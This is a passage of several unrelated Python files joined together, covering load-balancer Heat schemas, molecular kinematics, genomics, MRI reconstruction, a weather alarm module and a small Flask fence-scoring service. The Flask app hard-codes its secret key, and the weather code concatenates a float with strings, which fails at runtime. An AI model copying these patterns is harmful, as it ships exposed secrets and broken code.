        properties.Schema.BOOLEAN,
        _("Inherited config from VirtualService."),
        required=False,
        update_allowed=True,
    )
    created_by_schema = properties.Schema(
        properties.Schema.STRING,
        _("Creator name"),
        required=False,
        update_allowed=True,
    )
    cloud_config_cksum_schema = properties.Schema(
        properties.Schema.STRING,
        _("Checksum of cloud configuration for Pool. Internally set by cloud connector"),
        required=False,
        update_allowed=True,
    )
    request_queue_enabled_schema = properties.Schema(
        properties.Schema.BOOLEAN,
        _("Enable request queue when pool is full (Default: False)"),
        required=False,
        update_allowed=True,
    )
    request_queue_depth_schema = properties.Schema(
        properties.Schema.NUMBER,
        _("Minimum number of requests to be queued when pool is full. (Default: 128)"),
        required=False,
        update_allowed=True,
    )
    ab_pool_schema = properties.Schema(
        properties.Schema.MAP,
        _("(Deprecated in: 18.1.2) A/B pool configuration."),
        schema=AbPool.properties_schema,
        required=False,
        update_allowed=True,
    )
    server_reselect_schema = properties.Schema(
        properties.Schema.MAP,
        _("Server reselect configuration for HTTP requests."),
        schema=HTTPServerReselect.properties_schema,
        required=False,
        update_allowed=True,
    )
    a_pool_schema = properties.Schema(
        properties.Schema.STRING,
        _("(Deprecated in: 18.1.2) Name of container cloud application that constitutes A pool in a A-B pool configuration, if different from VS app"),
        required=False,
        update_allowed=True,
    )
    ab_priority_schema = properties.Schema(
        properties.Schema.NUMBER,
        _("(Deprecated in: 18.1.2) Priority of this pool in a A-B pool pair. Internally used"),
        required=False,
        update_allowed=True,
    )
    host_check_enabled_schema = properties.Schema(
        properties.Schema.BOOLEAN,
        _("Enable common name check for server certificate. If enabled and no explicit domain name is specified, Avi will use the incoming host header to do the match. (Default: False)"),
        required=False,
        update_allowed=True,
    )
    domain_name_item_schema = properties.Schema(
        properties.Schema.STRING,
        _("Comma separated list of domain names which will be used to verify the common names or subject alternative names presented by server certificates. It is performed only when common name check host_check_enabled is enabled."),
        required=True,
        update_allowed=False,
    )
    domain_name_schema = properties.Schema(
        properties.Schema.LIST,
        _("Comma separated list of domain names which will be used to verify the common names or subject alternative names presented by server certificates. It is performed only when common name check host_check_enabled is enabled."),
        schema=domain_name_item_schema,
        required=False,
        update_allowed=True,
    )
    sni_enabled_schema = properties.Schema(
        properties.Schema.BOOLEAN,
        _("Enable TLS SNI for server connections. If disabled, Avi will not send the SNI extension as part of the handshake. (Default: True)"),
        required=False,
        update_allowed=True,
    )
    server_name_schema = properties.Schema(
        properties.Schema.STRING,
        _("Fully qualified DNS hostname which will be used in the TLS SNI extension in server connections if SNI is enabled. If no value is specified, Avi will use the incoming host header instead."),
        required=False,
        update_allowed=True,
    )
    rewrite_host_header_to_sni_schema = properties.Schema(
        properties.Schema.BOOLEAN,
        _("If SNI server name is specified, rewrite incoming host header to the SNI server name. (Default: False)"),
        required=False,
        update_allowed=True,
    )
    rewrite_host_header_to_server_name_schema = properties.Schema(
        properties.Schema.BOOLEAN,
        _("Rewrite incoming Host Header to server name of the server to which the request is proxied. Enabling this feature rewrites Host Header for requests to all servers in the pool. (Default: False)"),
        required=False,
        update_allowed=True,
    )
    nsx_securitygroup_item_schema = properties.Schema(
        properties.Schema.STRING,
        _("(Introduced in: 17.1.1) A list of NSX Service Groups where the Servers for the Pool are created "),
        required=True,
        update_allowed=False,
    )
    nsx_securitygroup_schema = properties.Schema(
        properties.Schema.LIST,
        _("(Introduced in: 17.1.1) A list of NSX Service Groups where the Servers for the Pool are created "),
        schema=nsx_securitygroup_item_schema,
        required=False,
        update_allowed=True,
    )
    external_autoscale_groups_item_schema = properties.Schema(
        properties.Schema.STRING,
        _("(Introduced in: 17.1.2) Names of external auto-scale groups for pool servers. Currently available only for AWS and Azure"),
        required=True,
        update_allowed=False,
    )
    external_autoscale_groups_schema = properties.Schema(
        properties.Schema.LIST,
        _("(Introduced in: 17.1.2) Names of external auto-scale groups for pool servers. Currently available only for AWS and Azure"),
        schema=external_autoscale_groups_item_schema,
        required=False,
        update_allowed=True,
    )
    lb_algorithm_core_nonaffinity_schema = properties.Schema(
        properties.Schema.NUMBER,
        _("(Introduced in: 17.1.3) Degree of non-affinity for core afffinity based server selection. (Default: 2)"),
        required=False,
        update_allowed=True,
    )
    gslb_sp_enabled_schema = properties.Schema(
        properties.Schema.BOOLEAN,
        _("(Introduced in: 17.2.1) Indicates if the pool is a site-persistence pool. "),
        required=False,
        update_allowed=False,
    )
    lookup_server_by_name_schema = properties.Schema(
        properties.Schema.BOOLEAN,
        _("(Introduced in: 17.1.11,17.2.4) Allow server lookup by name. (Default: False)"),
        required=False,
        update_allowed=True,
    )
    description_schema = properties.Schema(
        properties.Schema.STRING,
        _("A description of the pool."),
        required=False,
        update_allowed=True,
    )
    cloud_uuid_schema = properties.Schema(
        properties.Schema.STRING,
        _(""),
        required=False,
        update_allowed=False,
    )
    # properties list
    PROPERTIES = (
        'avi_version',
        'name',
        'default_server_port',
        'graceful_disable_timeout',
        'connection_ramp_duration',
        'max_concurrent_connections_per_server',
        'health_monitor_uuids',
        'servers',
        'server_count',
        'lb_algorithm',
        'lb_algorithm_hash',
        'lb_algorithm_consistent_hash_hdr',
        'networks',
        'placement_networks',
        'application_persistence_profile_uuid',
        'ssl_profile_uuid',
        'inline_health_monitor',
        'use_service_port',
        'fail_action',
        'capacity_estimation',
        'capacity_estimation_ttfb_thresh',
        'pki_profile_uuid',
        'ssl_key_and_certificate_uuid',
        'server_auto_scale',
        'prst_hdr_name',
        'apic_epg_name',
        'autoscale_networks',
        'autoscale_policy_uuid',
        'autoscale_launch_config_uuid',
        'vrf_uuid',
        'ipaddrgroup_uuid',
        'fewest_tasks_feedback_delay',
        'enabled',
        'max_conn_rate_per_server',
        'east_west',
        'created_by',
        'cloud_config_cksum',
        'request_queue_enabled',
        'request_queue_depth',
        'ab_pool',
        'server_reselect',
        'a_pool',
        'ab_priority',
        'host_check_enabled',
        'domain_name',
        'sni_enabled',
        'server_name',
        'rewrite_host_header_to_sni',
        'rewrite_host_header_to_server_name',
        'nsx_securitygroup',
        'external_autoscale_groups',
        'lb_algorithm_core_nonaffinity',
        'gslb_sp_enabled',
        'lookup_server_by_name',
        'description',
        'cloud_uuid',
    )
    # mapping of properties to their schemas
    properties_schema = {
        'avi_version': avi_version_schema,
        'name': name_schema,
        'default_server_port': default_server_port_schema,
        'graceful_disable_timeout': graceful_disable_timeout_schema,
        'connection_ramp_duration': connection_ramp_duration_schema,
        'max_concurrent_connections_per_server': max_concurrent_connections_per_server_schema,
        'health_monitor_uuids': health_monitor_uuids_schema,
        'servers': servers_schema,
        'server_count': server_count_schema,
        'lb_algorithm': lb_algorithm_schema,
        'lb_algorithm_hash': lb_algorithm_hash_schema,
        'lb_algorithm_consistent_hash_hdr': lb_algorithm_consistent_hash_hdr_schema,
        'networks': networks_schema,
        'placement_networks': placement_networks_schema,
        'application_persistence_profile_uuid': application_persistence_profile_uuid_schema,
        'ssl_profile_uuid': ssl_profile_uuid_schema,
        'inline_health_monitor': inline_health_monitor_schema,
        'use_service_port': use_service_port_schema,
        'fail_action': fail_action_schema,
        'capacity_estimation': capacity_estimation_schema,
        'capacity_estimation_ttfb_thresh': capacity_estimation_ttfb_thresh_schema,
        'pki_profile_uuid': pki_profile_uuid_schema,
        'ssl_key_and_certificate_uuid': ssl_key_and_certificate_uuid_schema,
        'server_auto_scale': server_auto_scale_schema,
        'prst_hdr_name': prst_hdr_name_schema,
        'apic_epg_name': apic_epg_name_schema,
        'autoscale_networks': autoscale_networks_schema,
        'autoscale_policy_uuid': autoscale_policy_uuid_schema,
        'autoscale_launch_config_uuid': autoscale_launch_config_uuid_schema,
        'vrf_uuid': vrf_uuid_schema,
        'ipaddrgroup_uuid': ipaddrgroup_uuid_schema,
        'fewest_tasks_feedback_delay': fewest_tasks_feedback_delay_schema,
        'enabled': enabled_schema,
        'max_conn_rate_per_server': max_conn_rate_per_server_schema,
        'east_west': east_west_schema,
        'created_by': created_by_schema,
        'cloud_config_cksum': cloud_config_cksum_schema,
        'request_queue_enabled': request_queue_enabled_schema,
        'request_queue_depth': request_queue_depth_schema,
        'ab_pool': ab_pool_schema,
        'server_reselect': server_reselect_schema,
        'a_pool': a_pool_schema,
        'ab_priority': ab_priority_schema,
        'host_check_enabled': host_check_enabled_schema,
        'domain_name': domain_name_schema,
        'sni_enabled': sni_enabled_schema,
        'server_name': server_name_schema,
        'rewrite_host_header_to_sni': rewrite_host_header_to_sni_schema,
        'rewrite_host_header_to_server_name': rewrite_host_header_to_server_name_schema,
        'nsx_securitygroup': nsx_securitygroup_schema,
        'external_autoscale_groups': external_autoscale_groups_schema,
        'lb_algorithm_core_nonaffinity': lb_algorithm_core_nonaffinity_schema,
        'gslb_sp_enabled': gslb_sp_enabled_schema,
        'lookup_server_by_name': lookup_server_by_name_schema,
        'description': description_schema,
        'cloud_uuid': cloud_uuid_schema,
    }
    # for supporting get_avi_uuid_by_name functionality
    field_references = {
        'pki_profile_uuid': 'pkiprofile',
        'autoscale_policy_uuid': 'serverautoscalepolicy',
        'application_persistence_profile_uuid': 'applicationpersistenceprofile',
        'ipaddrgroup_uuid': 'ipaddrgroup',
        'server_reselect': getattr(HTTPServerReselect, 'field_references', {}),
        'ssl_key_and_certificate_uuid': 'sslkeyandcertificate',
        'max_conn_rate_per_server': getattr(RateProfile, 'field_references', {}),
        'placement_networks': getattr(PlacementNetwork, 'field_references', {}),
        'health_monitor_uuids': 'healthmonitor',
        'ssl_profile_uuid': 'sslprofile',
        'autoscale_launch_config_uuid': 'autoscalelaunchconfig',
        'ab_pool': getattr(AbPool, 'field_references', {}),
        'fail_action': getattr(FailAction, 'field_references', {}),
        'servers': getattr(Server, 'field_references', {}),
        'vrf_uuid': 'vrfcontext',
        'networks': getattr(NetworkFilter, 'field_references', {}),
    }
    # uniqueness metadata mirrored from the nested resource types
    unique_keys = {
        'server_reselect': getattr(HTTPServerReselect, 'unique_keys', {}),
        'max_conn_rate_per_server': getattr(RateProfile, 'unique_keys', {}),
        'placement_networks': getattr(PlacementNetwork, 'unique_keys', {}),
        'ab_pool': getattr(AbPool, 'unique_keys', {}),
        'fail_action': getattr(FailAction, 'unique_keys', {}),
        'servers': getattr(Server, 'unique_keys', {}),
        'networks': getattr(NetworkFilter, 'unique_keys', {}),
    }
class PoolServers(AviNestedResource, Server):
    """Nested Heat resource managing a single server entry of a pool.

    Inherits all per-server properties from ``Server`` and adds the
    identifying ``pool_uuid`` (the parent pool) plus ``avi_version``.
    """
    resource_name = "pool"
    # name of the list property on the parent resource this entry belongs to
    nested_property_name = "servers"
    parent_uuid_schema = properties.Schema(
        properties.Schema.STRING,
        _("UUID of pool."
          " You can also provide a name"
          " with the prefix 'get_avi_uuid_by_name:', e.g.,"
          " 'get_avi_uuid_by_name:my_obj_name'."),
        required=True,
        update_allowed=False,
    )
    avi_version_schema = properties.Schema(
        properties.Schema.STRING,
        _("Avi Version to use for the object. Default is 16.4.2. If you plan to use any fields introduced after 16.4.2, then this needs to be explicitly set."),
        required=False,
        update_allowed=True,
    )
    # properties list
    PROPERTIES = Server.PROPERTIES + (
        'pool_uuid','avi_version')
    # mapping of properties to their schemas
    properties_schema = {
        'avi_version': avi_version_schema,
        'pool_uuid': parent_uuid_schema,
    }
    # merge in the inherited per-server property schemas
    properties_schema.update(Server.properties_schema)
    # field references
    field_references = {
        'pool_uuid': 'pool',
    }
    field_references.update(getattr(Server, 'field_references', {}))
def resource_mapping():
    """Return the registry mapping Heat resource type names to classes.

    Heat calls this hook at plugin load time to discover which resource
    classes this module provides.
    """
    registry = {}
    registry['Avi::LBaaS::PriorityLabels'] = PriorityLabels
    registry['Avi::LBaaS::PoolGroup'] = PoolGroup
    registry['Avi::LBaaS::Pool::Server'] = PoolServers
    registry['Avi::LBaaS::PoolGroupDeploymentPolicy'] = PoolGroupDeploymentPolicy
    registry['Avi::LBaaS::Pool'] = Pool
    return registry
| 65,366 | 19,066 |
# -*- coding: UTF-8 -*-
from app.service.base_service import BaseService
from app.repository.account_title_repository import AccountTitleRepository


class AccountTitleService(BaseService):
    """Service layer for account-title CRUD operations.

    Thin delegation wrapper: every method forwards its arguments unchanged
    to ``AccountTitleRepository`` and returns the repository's result.
    """

    def __init__(self):
        # Fixed: attribute was misspelled "__reposiroty"; it is private
        # (name-mangled, used only inside this class), so renaming is safe.
        # Also removed a dead trailing `pass` statement.
        self.__repository = AccountTitleRepository()

    def getList(self, user_id, limit, offset):
        """Return a page of account titles owned by *user_id*."""
        return self.__repository.findList(user_id, limit, offset)

    def get(self, user_id, account_title_id):
        """Return the single account title identified by *account_title_id*."""
        return self.__repository.find(user_id, account_title_id)

    def create(self, user_id, account_title_name, account_title_classification_type):
        """Create a new account title for *user_id* and return the result."""
        return self.__repository.insert(
            user_id, account_title_name, account_title_classification_type)

    def update(self, account_title_id, user_id, account_title_name, account_title_classification_type):
        """Update an existing account title and return the result."""
        return self.__repository.update(
            account_title_id, user_id, account_title_name,
            account_title_classification_type)

    def delete(self, account_title_id, user_id):
        """Delete the account title identified by *account_title_id*."""
        return self.__repository.delete(account_title_id, user_id)
## Automatically adapted for numpy.oldnumeric Jul 23, 2007 by
#
# Last modified on Mon Oct 15 15:33:49 PDT 2001 by lindy
#
# $Header: /opt/cvs/python/packages/share1.5/mglutil/math/kinematics.py,v 1.16 2007/07/24 17:30:40 vareille Exp $
#
"""kinematics.py - kinematic manipulation of chains of points
All transformations happen in the local coordinate space.
The refCoords supplied to the constructor and returned by the object
are local to the object. Clients should handle putting the points into
world coordinates (using translation, orientation, and origin).
"""
# from mglutil.math.ncoords import Ncoords
from mglutil.math.rotax import rotax
import numpy.oldnumeric as Numeric, math
class Kinematics:
    """Apply torsion-tree rotations to a molecule's atom coordinates.

    Walks a torsion tree (``torTree``) and, for each node, rotates the
    atoms of its subtree about the node's rotatable bond by the node's
    pre-set torsion angle.  Atom coordinates are updated in place on the
    ``atomSet`` entries held by the tree nodes.  All transformations happen
    in local coordinate space; clients handle translation/orientation into
    world coordinates.
    """
    # conversion factor: degrees -> radians
    rads_per_degree = Numeric.pi / 180.0

    def __init__(self, allAtomsCoords, torTree, tolist=1):
        """Store the atom coordinates and the torsion tree.

        allAtomsCoords -- coordinates of all atoms (kept as a reference,
            not copied)
        torTree -- torsion tree whose nodes carry bonds, angles and atoms
        tolist -- accepted for API compatibility but unused here
        """
        self.allAtomsCoords = allAtomsCoords
        self.torTree = torTree

    def __applyTorsion(self, node, parent_mtx):
        """Transform the subtree rooted at node.
        The new torsion angle must be pre-set.
        Children of the node are transformed recursively.
        """
        # get rotation matrix for node
        # my_mtx = self.rotax(node)
        # Build a 4x4 rotation about the node's bond axis a->b; transpose=1
        # yields the row-vector (translation-in-last-row) convention used below.
        mtx = rotax(
            Numeric.array(node.a.coords),
            Numeric.array(node.b.coords),
            node.angle * self.rads_per_degree,
            transpose=1,
        )
        # node_mtx = Numeric.dot(parent_mtx, mtx)
        # Compose with the accumulated parent transform (affine 4x4 product).
        node_mtx = self.mult4_3Mat(parent_mtx, mtx)
        # set-up for the transformation
        # Hoist matrix entries into locals to avoid repeated indexing in the loop.
        mm11 = node_mtx[0][0]
        mm12 = node_mtx[0][1]
        mm13 = node_mtx[0][2]
        mm21 = node_mtx[1][0]
        mm22 = node_mtx[1][1]
        mm23 = node_mtx[1][2]
        mm31 = node_mtx[2][0]
        mm32 = node_mtx[2][1]
        mm33 = node_mtx[2][2]
        mm41 = node_mtx[3][0]
        mm42 = node_mtx[3][1]
        mm43 = node_mtx[3][2]
        atomSet = node.atomSet
        # transform the coordinates for the node
        # Row-vector convention: [x y z 1] * M; writes results in place.
        for i in node.atomRange:
            x, y, z = node.coords[i][:3]  # get origin-subtracted originals
            c = atomSet[i].coords
            c[0] = x * mm11 + y * mm21 + z * mm31 + mm41
            c[1] = x * mm12 + y * mm22 + z * mm32 + mm42
            c[2] = x * mm13 + y * mm23 + z * mm33 + mm43
        # recurse through children
        for child in node.children:
            self.__applyTorsion(child, node_mtx)

    def applyAngList(self, angList, mtx):
        """Set all torsion angles from angList, apply the root transform mtx
        to the root node's atoms, then recursively apply the torsions to
        every subtree.  Atom coordinates are updated in place."""
        # pre-set the torsion angles
        self.torTree.setTorsionAngles(angList)
        # set-up for the transformation
        # Hoist matrix entries into locals (same row-vector convention as
        # __applyTorsion).
        mm11 = mtx[0][0]
        mm12 = mtx[0][1]
        mm13 = mtx[0][2]
        mm21 = mtx[1][0]
        mm22 = mtx[1][1]
        mm23 = mtx[1][2]
        mm31 = mtx[2][0]
        mm32 = mtx[2][1]
        mm33 = mtx[2][2]
        mm41 = mtx[3][0]
        mm42 = mtx[3][1]
        mm43 = mtx[3][2]
        root = self.torTree.rootNode
        atomSet = root.atomSet
        # transform the coordinates for the node
        for i in root.atomRange:
            x, y, z = root.coords[i][:3]
            c = atomSet[i].coords
            c[0] = x * mm11 + y * mm21 + z * mm31 + mm41
            c[1] = x * mm12 + y * mm22 + z * mm32 + mm42
            c[2] = x * mm13 + y * mm23 + z * mm33 + mm43
        # traverse children of rootNode
        for child in root.children:
            self.__applyTorsion(child, mtx)

    def mult4_3Mat(self, m1, m2):
        # Multiply two 4x4 affine matrices in row-vector form (rotation in
        # the upper-left 3x3, translation in row 4); the fourth column is
        # assumed to be (0, 0, 0, 1) and is emitted as such in the result.
        ma11 = m1[0][0]
        ma12 = m1[0][1]
        ma13 = m1[0][2]
        ma21 = m1[1][0]
        ma22 = m1[1][1]
        ma23 = m1[1][2]
        ma31 = m1[2][0]
        ma32 = m1[2][1]
        ma33 = m1[2][2]
        ma41 = m1[3][0]
        ma42 = m1[3][1]
        ma43 = m1[3][2]
        mb11 = m2[0][0]
        mb12 = m2[0][1]
        mb13 = m2[0][2]
        mb21 = m2[1][0]
        mb22 = m2[1][1]
        mb23 = m2[1][2]
        mb31 = m2[2][0]
        mb32 = m2[2][1]
        mb33 = m2[2][2]
        mb41 = m2[3][0]
        mb42 = m2[3][1]
        mb43 = m2[3][2]
        # first line of resulting matrix
        val1 = ma11 * mb11 + ma12 * mb21 + ma13 * mb31
        val2 = ma11 * mb12 + ma12 * mb22 + ma13 * mb32
        val3 = ma11 * mb13 + ma12 * mb23 + ma13 * mb33
        result = [[val1, val2, val3, 0.0]]
        # second line of resulting matrix
        val1 = ma21 * mb11 + ma22 * mb21 + ma23 * mb31
        val2 = ma21 * mb12 + ma22 * mb22 + ma23 * mb32
        val3 = ma21 * mb13 + ma22 * mb23 + ma23 * mb33
        result.append([val1, val2, val3, 0.0])
        # third line of resulting matrix
        val1 = ma31 * mb11 + ma32 * mb21 + ma33 * mb31
        val2 = ma31 * mb12 + ma32 * mb22 + ma33 * mb32
        val3 = ma31 * mb13 + ma32 * mb23 + ma33 * mb33
        result.append([val1, val2, val3, 0.0])
        # fourth line of resulting matrix
        # translation row: rotate m1's translation by m2, then add m2's.
        val1 = ma41 * mb11 + ma42 * mb21 + ma43 * mb31 + mb41
        val2 = ma41 * mb12 + ma42 * mb22 + ma43 * mb32 + mb42
        val3 = ma41 * mb13 + ma42 * mb23 + ma43 * mb33 + mb43
        result.append([val1, val2, val3, 1.0])
        return result

    def rotax(self, node):
        """
        Build 4x4 matrix of clockwise rotation about axis a-->b
        by angle tau (radians).
        a and b are numeric arrays of floats of shape (3,)
        Result is a homogenous 4x4 transformation matrix.
        NOTE: This has been changed by Brian, 8/30/01: rotax now returns
        the rotation matrix, _not_ the transpose. This is to get
        consistency across rotax, mat_to_quat and the classes in
        transformation.py
        NOTE(review): this method shadows the module-level ``rotax`` imported
        above; __applyTorsion calls the imported function, not this method.
        """
        tau = node.angle * self.rads_per_degree
        ct = math.cos(tau)
        ct1 = 1.0 - ct
        st = math.sin(tau)
        v = node.torUnitVector
        rot = Numeric.zeros((4, 4), "f")
        # Compute 3x3 rotation matrix
        v2 = v * v
        v3 = (1.0 - v2) * ct
        rot[0][0] = v2[0] + v3[0]
        rot[1][1] = v2[1] + v3[1]
        rot[2][2] = v2[2] + v3[2]
        rot[3][3] = 1.0
        v2 = v * st
        rot[1][0] = v[0] * v[1] * ct1 - v2[2]
        rot[2][1] = v[1] * v[2] * ct1 - v2[0]
        rot[0][2] = v[2] * v[0] * ct1 - v2[1]
        rot[0][1] = v[0] * v[1] * ct1 + v2[2]
        rot[1][2] = v[1] * v[2] * ct1 + v2[0]
        rot[2][0] = v[2] * v[0] * ct1 + v2[1]
        # add translation
        a = node.torBase.coords
        # debug trace of the torsion base atom
        print((" torBase (%2d) %4f, %4f, %4f:" % (node.bond[0], a[0], a[1], a[2])))
        for i in (0, 1, 2):
            rot[3][i] = a[i]
            for j in (0, 1, 2):
                rot[3][i] = rot[3][i] - rot[j][i] * a[j]
            rot[i][3] = 0.0
        return rot
| 6,728 | 2,823 |
import pandas as pd
import numpy as np
__all__ = ["expand_bed_regions"]
def expand_bed_regions(bed: pd.DataFrame, window_size: int, alignment: str = "center") -> pd.DataFrame:
    """Resize every region of a bed-like dataframe to ``window_size``.

    Parameters
    ----------
    bed: pd.DataFrame,
        Pandas dataframe in bed-like format; must expose ``chromStart``
        and ``chromEnd`` columns, which are updated in place.
    window_size: int,
        Target window size; must be a positive integer.
    alignment: str,
        How to anchor the window: "left" keeps chromStart fixed and
        expands rightwards, "right" keeps chromEnd fixed and expands
        leftwards, "center" expands both ways around the midpoint
        (the extra base of an odd window goes to the right).
        Default is "center".

    Comments
    -----------------------
    For enhancer peaks one should generally use center alignment, while
    for promoter peaks use right or left alignment depending on strand
    (right for positive, left for negative).

    Raises
    -----------------------
    ValueError,
        If the given window size is not a positive integer.
    ValueError,
        When the given alignment is not supported.

    Returns
    -----------------------
    The same dataframe, with regions resized to the requested window.
    """
    if not isinstance(window_size, int) or window_size < 1:
        raise ValueError("Window size must be a positive integer.")

    if alignment == "left":
        # Keep the left edge fixed, grow rightwards.
        bed["chromEnd"] = bed["chromStart"] + window_size
    elif alignment == "right":
        # Keep the right edge fixed, grow leftwards.
        bed["chromStart"] = bed["chromEnd"] - window_size
    elif alignment == "center":
        # Grow symmetrically around the integer midpoint.
        centers = (bed["chromStart"] + bed["chromEnd"]) // 2
        bed["chromStart"] = (centers - np.floor(window_size / 2)).astype(int)
        bed["chromEnd"] = (centers + np.ceil(window_size / 2)).astype(int)
    else:
        raise ValueError(
            "Invalid alignment parameter {}. "
            "Supported values are: left, right or center.".format(alignment)
        )
    return bed
| 2,178 | 567 |
"""
Neuroimaging non-cartesian reconstruction
=========================================
Author: Chaithya G R
In this tutorial we will reconstruct an MRI image from non-cartesian kspace
measurements.
Import neuroimaging data
------------------------
We use the toy datasets available in pysap, more specifically a 2D brain slice
and the acquisition cartesian scheme.
"""
# Package import
from mri.numerics.fourier import NFFT
from mri.numerics.reconstruct import sparse_rec_fista
from mri.numerics.utils import generate_operators
from mri.numerics.utils import convert_locations_to_mask
from mri.parallel_mri.extract_sensitivity_maps import \
gridded_inverse_fourier_transform_nd
import pysap
from pysap.data import get_sample_data
# Third party import
from modopt.math.metrics import ssim
import numpy as np
# Loading input data
image = get_sample_data('2d-mri')
# Obtain MRI non-cartesian mask
radial_mask = get_sample_data("mri-radial-samples")
kspace_loc = radial_mask.data
mask = pysap.Image(data=convert_locations_to_mask(kspace_loc, image.shape))
# View Input
# image.show()
# mask.show()
#############################################################################
# Generate the kspace
# -------------------
#
# From the 2D brain slice and the acquisition mask, we retrospectively
# undersample the k-space using a radial acquisition mask
# We then reconstruct the zero order solution as a baseline
# Get the locations of the kspace samples and the associated observations
fourier_op = NFFT(samples=kspace_loc, shape=image.shape)
kspace_obs = fourier_op.op(image.data)
# Gridded solution
grid_space = np.linspace(-0.5, 0.5, num=image.shape[0])
grid2D = np.meshgrid(grid_space, grid_space)
grid_soln = gridded_inverse_fourier_transform_nd(kspace_loc, kspace_obs,
tuple(grid2D), 'linear')
image_rec0 = pysap.Image(data=grid_soln)
# image_rec0.show()
base_ssim = ssim(image_rec0, image)
print('The Base SSIM is : ' + str(base_ssim))
#############################################################################
# FISTA optimization
# ------------------
#
# We now want to refine the zero order solution using a FISTA optimization.
# The cost function is set to Proximity Cost + Gradient Cost
# Generate operators
gradient_op, linear_op, prox_op, cost_op = generate_operators(
data=kspace_obs,
wavelet_name="sym8",
samples=kspace_loc,
mu=6 * 1e-7,
nb_scales=4,
non_cartesian=True,
uniform_data_shape=image.shape,
gradient_space="synthesis")
# Start the FISTA reconstruction
max_iter = 200
x_final, costs, metrics = sparse_rec_fista(
gradient_op=gradient_op,
linear_op=linear_op,
prox_op=prox_op,
cost_op=cost_op,
lambda_init=1.0,
max_nb_of_iter=max_iter,
atol=1e-4,
verbose=1)
image_rec = pysap.Image(data=np.abs(x_final))
# image_rec.show()
recon_ssim = ssim(image_rec, image)
print('The Reconstruction SSIM is : ' + str(recon_ssim))
| 2,972 | 989 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib
import urllib2
import json
import decimal
import time
from apcontent import alarmpi_content
class weather_yahoo(alarmpi_content):
def build(self):
location = self.sconfig['location']
if self.sconfig['metric'] == str(1):
metric = '%20and%20u%3D\'c\''
else:
metric = ''
try:
weather_url = "https://" + \
self.sconfig["host"] + \
self.sconfig["path"] + \
location + \
metric + \
self.sconfig['pathtail']
weather_api = urllib.urlopen(weather_url)
response = weather_api.read()
response_dictionary = json.loads(response)
current = response_dictionary['query']['results']['channel']['item']['condition']['temp']
current_low = response_dictionary['query']['results']['channel']['item']['forecast'][0]['low']
current_high = response_dictionary['query']['results']['channel']['item']['forecast'][0]['high']
conditions = response_dictionary['query']['results']['channel']['item']['condition']['text']
forecast_conditions = response_dictionary['query']['results']['channel']['item']['forecast'][0]['text']
wind = response_dictionary['query']['results']['channel']['wind']['speed']
wind_chill = response_dictionary['query']['results']['channel']['wind']['chill']
sunrise = response_dictionary['query']['results']['channel']['astronomy']['sunrise']
sunset = response_dictionary['query']['results']['channel']['astronomy']['sunset']
if wind != '':
if self.debug:
print response_dictionary ['query']['results']['channel']['wind']['speed']
wind = round(float(wind),1)
# print current
# print current_low
# print current_high
# print conditions
# print wind
if conditions != forecast_conditions:
conditions = conditions + ' becoming ' + forecast_conditions
weather_yahoo = 'Weather for today is ' + str(conditions) + ' currently ' + str(current) + ' degrees with a low of ' + str(current_low) + ' and a high of ' + str(current_high) + '. '
# Wind uses the Beaufort scale
if self.sconfig['metric'] == str(1) and self.sconfig['wind'] == str(1):
if wind < 1:
gust = 'It is calm'
if wind > 1:
gust = 'With Light Air'
if wind > 5:
gust = 'With a light breeze'
if wind > 12:
gust = 'With a gentle breeze'
if wind > 20:
gust = 'With a moderate breeze'
if wind > 29:
gust = 'With a fresh breeze'
if wind > 39:
gust = 'With a strong breeze'
if wind > 50:
gust = 'With High winds at ' + wind + 'kilometres per hour'
if wind > 62:
gust = 'With Gale force winds at ' + wind + 'kilometres per hour'
if wind > 75:
gust = 'With a strong gale at ' + wind + 'kilometres per hour'
if wind > 89:
gust = 'With Storm winds at ' + wind + 'kilometres per hour'
if wind > 103:
gust = 'With Violent storm winds at ' + wind + 'kilometres per hour'
if wind > 118:
gust = 'With Hurricane force winds at ' + wind + 'kilometres per hour'
if wind == '':
gust = ''
weather_yahoo = weather_yahoo + str(gust) + '. '
if (self.sconfig['wind_chill'] == str(1) and
wind > 5 and
int(time.strftime("%m")) < 4 or
wind > 5 and
int(time.strftime("%m")) > 10):
weather_yahoo = weather_yahoo + ' And a windchill of ' + str(wind_chill) + '. '
except Exception:
weather_yahoo = 'Failed to connect to Yahoo Weather. '
if self.debug:
print weather_yahoo
self.content = weather_yahoo
| 3,996 | 1,178 |
import sys
import logging
import socket
import argparse
import json
import os
import data_model
from flask import Flask
app = Flask(__name__)
# NOTE(review): the session secret key is hard-coded in source. Acceptable
# for a demo/scoring service, but load it from the environment or a config
# file for anything real.
app.secret_key = 'NpaguVKgv<;f;i(:T>3tn~dsOue5Vy)'
@app.route('/degrade/<int:index>/')
def degrade_segment(index):
    """Weaken fence segment *index* by one degradation step.

    Returns 'bad' for an out-of-range index, 'done' otherwise.
    """
    if not 0 <= index < 97:
        return 'bad'
    data_model.load_from_disk()
    segment = list(data_model.fence_segments.values())[index]
    segment.state -= 0.067
    data_model.save_to_disk()
    return 'done'
@app.route('/fence/<string:dinosaur>/<int:percent>/')
def exhibit_contained(dinosaur, percent):
    """Report whether at least *percent* of the fence sections for
    *dinosaur* (or 'all') are up, i.e. have state >= 0.3.

    Returns 'error' for an unknown dinosaur name, otherwise 'up' or
    'down'.
    """
    if dinosaur not in ['velociraptor', 'tyrannosaurus', 'guaibasaurus', 'triceratops', 'all']:
        return 'error'
    data_model.load_from_disk()
    number_up = 0
    total_number = 0
    for section in data_model.fence_segments.values():
        if dinosaur == 'all' or section.dinosaur == dinosaur:
            total_number += 1
            if section.state >= 0.3:
                number_up += 1
    # Guard: with no matching sections the old code divided by zero and
    # the request 500'd. Treat "no fence at all" as down.
    if total_number == 0:
        return 'down'
    percent_up = int(100 * (float(number_up) / float(total_number)))
    if percent_up >= percent:
        return 'up'
    else:
        return 'down'
def main():
    """Parse the command line, initialise the database and run the app."""
    arg_parser = argparse.ArgumentParser(prog='triassic_scoring.py')
    arg_parser.add_argument('-f', '--file', help="Path to the ZODB persistence file to use.")
    arg_parser.add_argument('-a', '--address', default='0.0.0.0', dest='host')
    arg_parser.add_argument('-p', '--port', default='5000', dest='port')
    args = arg_parser.parse_args()
    # Initialize the database, if needed (None selects the default path).
    data_model.init_db(args.file or None)
    app.run(host=args.host, port=args.port)


if __name__ == "__main__":
    main()
| 1,857 | 667 |
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
#Submitted by thr3sh0ld
class Solution:
